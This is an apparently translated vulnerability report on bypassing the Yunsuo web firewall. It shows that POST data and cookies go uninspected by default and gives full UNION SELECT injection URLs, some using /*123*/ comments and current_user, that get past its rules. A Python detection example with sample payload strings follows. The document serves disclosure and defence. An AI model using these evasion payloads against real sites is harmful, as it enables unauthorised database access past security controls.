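### Brief description:
After several weeks of trying, I finally got around it. It really wasn't easy; requesting the front page.
Persistence is an attitude~
### Details:
Tested against the latest Windows build, win_1.3.191.
There are two problems:
1. The default configuration does not protect POST data or cookies; the protection features that exist should be ticked by default.
![y.jpg](https://images.seebug.org/upload/201503/221526272b1c2aece20b6b431de64be51d694796.jpg)
2. The protection rules can be bypassed with comments of the form /*123*/.
### Proof of vulnerability:
As before, set up an injection test environment:
1. First try /**/; Yunsuo blocks it: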
```
http://localhost/74/wap/wap-company-show.php?id=8E0union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
```
![2.jpg](https://images.seebug.org/upload/201503/22152947bc23b6813011590dbe5a7ff5b01497b0.jpg)
2. Using /*123*/ instead, the request goes through and many columns are returned:
```
http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
```
![1.jpg](https://images.seebug.org/upload/201503/221528336bd498d8ce296273e5ea6deeba52d3e5.jpg)
3. Then another problem came up: Yunsuo turned out to be very strict about database query functions.
```
http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,user%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
```
![3.jpg](https://images.seebug.org/upload/201503/221531374299d7a0bfbd3d57da283edd8ba82eee.jpg)
4. After several weeks of study, I found that current_user gets past it again!
```
http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
```
![4.jpg](https://images.seebug.org/upload/201503/2215330881a0dae42e1d7c601c74e058d483e8b2.jpg)
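
Why the rule misses steps 2 and 4, shown from the detection side as an added example (not part of the original report and not Yunsuo's code). `NAIVE_RULE` is an assumed model of a rule that only knows the empty comment, and the sample strings are constructed, shortened versions of the requests above.

```python
import re
from urllib.parse import unquote

# Constructed "before" rule (assumption): only whitespace or the empty
# comment /**/ is recognised as a separator between the two keywords.
NAIVE_RULE = re.compile(r"union(?:\s|/\*\*/)+select", re.I)

# Hardened path: strip every /* ... */ comment regardless of its body,
# then match on the normalised text.
COMMENT = re.compile(r"/\*.*?\*/", re.S)
# No leading \b: in the report the keyword is glued to a numeric literal (8E0union).
UNION_SELECT = re.compile(r"union\s+select\b")
# user() and the parenthesis-free current_user both return the account name.
IDENTITY = re.compile(r"\buser\s*\(|\bcurrent_user\b")


def normalize(raw: str) -> str:
    """URL-decode, replace SQL block comments with a space, fold case and whitespace."""
    text = COMMENT.sub(" ", unquote(raw))
    return re.sub(r"\s+", " ", text).lower()


def naive_check(raw: str) -> bool:
    """Match the raw (decoded) input without any comment normalisation."""
    return bool(NAIVE_RULE.search(unquote(raw)))


def hardened_check(raw: str) -> list:
    """Return the names of the rules that fire on the normalised input."""
    text = normalize(raw)
    hits = []
    if UNION_SELECT.search(text):
        hits.append("union-select")
    if IDENTITY.search(text):
        hits.append("identity-function")
    return hits


# Constructed samples, shortened from the requests in the report.
SAMPLES = [
    "id=8E0union/**/select/**/1,2,3",
    "id=8E0union/*123*/select/*123*/1,2,3",
    "id=8E0union/*123*/select/*123*/1,2,user%28%29",
    "id=8E0union/*123*/select/*123*/1,2,current_user",
    "id=8",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:55} naive={naive_check(s)} hardened={hardened_check(s)}")
```

The same check belongs on POST bodies and cookie values as well as the query string, since the first finding is that those are not inspected by default.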